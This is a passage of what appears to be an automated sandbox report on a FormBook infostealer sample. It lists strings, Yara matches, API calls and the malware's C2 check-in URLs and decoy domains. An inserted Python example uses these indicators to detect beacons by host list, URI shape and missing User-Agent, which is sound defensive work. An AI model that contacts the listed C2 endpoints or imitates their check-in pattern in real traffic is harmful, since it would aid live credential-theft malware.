          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns-m
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/4
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/B
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/0
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
          Source: mstsc.exe, 00000015.00000002.500275639.0000000000957000.00000004.00000020.sdmpString found in binary or memory: http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi01
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com2
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.come
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
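The configuration under Malware Configuration and the check-ins in this section describe one indicator from two sides. The config carries a single real C2 entry (www.adultpeace.com/p2io/) and a long list of domains the extractor labels decoys; the traffic the sandbox actually captured went to two of those decoys (aideliveryrobot.com, anewdistraction.com) with the same /p2io/ path, the same two query keys (l8Wd, 4hUd), no User-Agent and a 7-byte all-zero body, and a third decoy (pyithuhluttaw.net) was resolved. A 404 from openresty is consistent with that: the decoys are unrelated sites with no handler for that path. So the useful network check is not "host equals the C2" but "host is anywhere in the config and the URI shape matches", plus the config-free observation that one URI shape is being sent to many unrelated hosts. The Python below is an added example, not part of the report and not Joe Sandbox code, that does both against a small HTTP capture. The first two requests are the ones the report shows; the request to the configured C2 host and the benign browser request are invented for contrast, and the decoy list is cut down to the entries the example needs.

```python
import json
from urllib.parse import urlsplit, parse_qsl

# Copied from the report's extracted configuration. The decoy list is cut to
# the entries this example needs; the real config names 64 decoy domains.
CONFIG = json.loads("""{
  "C2 list": ["www.adultpeace.com/p2io/"],
  "decoy": ["pyithuhluttaw.net", "anewdistraction.com", "aideliveryrobot.com"]
}""")

# Constructed captures. The first two are the GETs the sandbox logged, with the
# headers the report shows; the third (configured C2 host, made-up 4hUd value)
# and the fourth (benign browser request) are invented for contrast.
REQUESTS = [
    "GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1\r\n"
    "Host: www.aideliveryrobot.com\r\nConnection: close\r\n\r\n",
    "GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1\r\n"
    "Host: www.anewdistraction.com\r\nConnection: close\r\n\r\n",
    "GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=AAAA HTTP/1.1\r\n"
    "Host: www.adultpeace.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line plus headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "query": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "headers": headers,
        "host": headers.get("host", ""),
    }


def _norm(host):
    """Lower-case, drop a port and a leading 'www.' so config and Host compare."""
    host = host.lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def config_index(cfg):
    """Split the 'host/path' C2 entries and normalise the decoy set."""
    c2 = {}
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2[_norm(host)] = "/" + path
    return c2, {_norm(d) for d in cfg["decoy"]}


def classify(req, cfg):
    """Findings for one request: which list the host is on when the URI path is
    a configured C2 path, and the missing User-Agent the report flags as
    'HTTP GET or POST without a user agent'."""
    c2, decoys = config_index(cfg)
    host = _norm(req["host"])
    on_c2_path = any(req["path"].startswith(p) for p in c2.values())
    findings = []
    if on_c2_path and host in c2:
        findings.append("c2-host")
    elif on_c2_path and host in decoys:
        findings.append("decoy-host")
    if on_c2_path and "user-agent" not in req["headers"]:
        findings.append("no-user-agent")
    return findings


def correlate_uri_shape(reqs):
    """Config-free check: one (path, query-key set) sent to several hosts.
    Returns {(path, keys): [hosts]} for shapes seen on two or more hosts."""
    shapes = {}
    for r in reqs:
        key = (r["path"], tuple(sorted(r["query"])))
        shapes.setdefault(key, set()).add(_norm(r["host"]))
    return {k: sorted(v) for k, v in shapes.items() if len(v) >= 2}


PARSED = [parse_request(r) for r in REQUESTS]

if __name__ == "__main__":
    for r in PARSED:
        print(r["host"], r["path"], classify(r, CONFIG))
    print(correlate_uri_shape(PARSED))
```

Blocking only the C2 host from the config would have missed every request in this capture; treating the whole decoy list as indicators, or alerting on one URI shape fanning out across unrelated hosts with no User-Agent, catches the check-in regardless of which entry the bot tries first.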

E-Banking Fraud:

Yara detected FormBook
Source: the same nine Yara matches (two unpacked PEs, seven memory dumps) listed under AV Detection above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00418260 NtReadFile
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_004182E0 NtClose
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_004182AC NtReadFile
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041838B NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AFB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AFAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9560 NtWriteFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AFA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AFA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AF9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AFA770 NtOpenThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_007081B0 NtCreateFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_00708260 NtReadFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_007082E0 NtClose
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_00708390 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_007082AC NtReadFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070838B NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054B673
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_01080418
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_01082630
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_01080408
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_01080013
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_01080040
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_010EC27C
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_010EEC48
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_010EEC58
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 0_2_0054B6C0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00401030
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B8B1
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B963
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00408C50
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B493
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041B496
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041C539
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00402D89
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00402D90
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041CE85
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041BF12
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_0041C795
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7B673
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe | Code function: 4_2_00A7B6C0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AE20A0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B820A8
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04ACB090
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AC841F
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B71002
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AE2581
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04ACD5E0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AB0D20
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AD4120
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04ABF900
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B82D07
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B81D55
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B822AE
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B82EF7
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AD6E30
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04AEEBB0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B81FF1
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_04B82B28
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070B8B1
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070B954
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_006F8C4B
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_006F8C50
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070B493
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070B496
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070C539
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_006F2D89
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_006F2D90
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070CE85
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070BF12
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_006F2FB0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 21_2_0070C795
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 04ABB150 appears 35 times
          Source: JFBlvEr5H9.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: JFBlvEr5H9.exe, 00000000.00000002.259012000.0000000002AC1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameConfigNodeType.dll> vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameStoreElement.dllB vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.257828156.000000000064A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000000.00000002.275089237.0000000006FF0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000000.256995077.0000000000B7A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000002.357592649.0000000003783000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemstsc.exej% vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe, 00000004.00000002.356712545.00000000018CF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe | Binary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
          Source: JFBlvEr5H9.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
